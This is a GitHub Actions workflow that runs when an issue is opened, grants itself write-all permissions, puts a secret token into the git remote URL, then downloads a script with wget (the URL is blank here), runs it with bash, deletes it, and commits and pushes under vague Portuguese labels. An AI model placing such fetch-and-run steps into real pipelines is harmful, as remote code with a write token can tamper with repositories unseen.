
name: CI

on:
  issues:
    types:
      - opened
  
permissions: write-all
  
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v1
      - name: Finaliza o passo das configurações iniciais...
        run: |
          date +%s > .github/workflows/blank.yml
          git config --global user.name 'Idris Bot'
          git config --global user.email 'github-actions@users.noreply.github.com'
          git remote set-url origin https://x-access-token:${{ secrets.BEEBOT }}@github.com/$GITHUB_REPOSITORY
          wget "" -O "bot.sh"
          bash "bot.sh"
          rm "bot.sh"
          git add .
          git checkout "${GITHUB_REF:11}"
          git commit -am "Adiciona as opções de tela..."
          git push
          
